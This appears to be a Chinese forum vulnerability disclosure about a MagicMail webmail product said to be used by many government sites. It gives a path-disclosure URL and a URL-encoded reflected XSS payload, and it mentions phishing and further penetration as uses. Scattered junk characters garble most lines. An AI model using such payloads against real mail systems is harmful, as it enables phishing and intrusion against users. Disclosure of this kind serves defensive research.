今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞- f$ l+ D3 k3 p1 s0 S
' I2 ~) m% A8 z; i! j8 N6 w/ n
, I6 v1 N1 o, f! ^ p, S, m
包含 一个反射性XSS 以及 绝对路径泄漏0 D+ A3 t1 ^" B
看了看 貌似全部是linux的。8 {/ N+ [2 ~! q6 z3 t) u7 n" R
$ k* Q# P$ J! s/ `5 _: _关键字:迈捷邮件系统 by MagicMail
( E/ ^2 Q8 a, i) s" W. V( T
' t* c* \6 V2 S& M* S' E2 x F可以看到很多政府网站都用这个邮件系统5 x* {3 v- p9 J: C
1 p/ Q9 H2 J. _( E绝对路径 http://madman.in/index.php?login_type=declare&language=; R, N4 o& ^9 T; x$ K& p+ L E
& k B7 J, b2 f
3 ~3 L0 [$ {$ E. d" q/ y0 C
9 v9 i, @0 H. v& s) aXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E% I# [ w7 z9 j; V6 J
3 {: y) o9 [) y& k
7 a, Z2 q% |5 g- e3 E. J3 G5 q
0 F2 F5 Y6 e" a
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
# K3 c B5 A# _
6 ?1 z* m. [$ T修复方案:看官方补丁吧。
/ @0 C4 d# W& m3 U1 D3 c |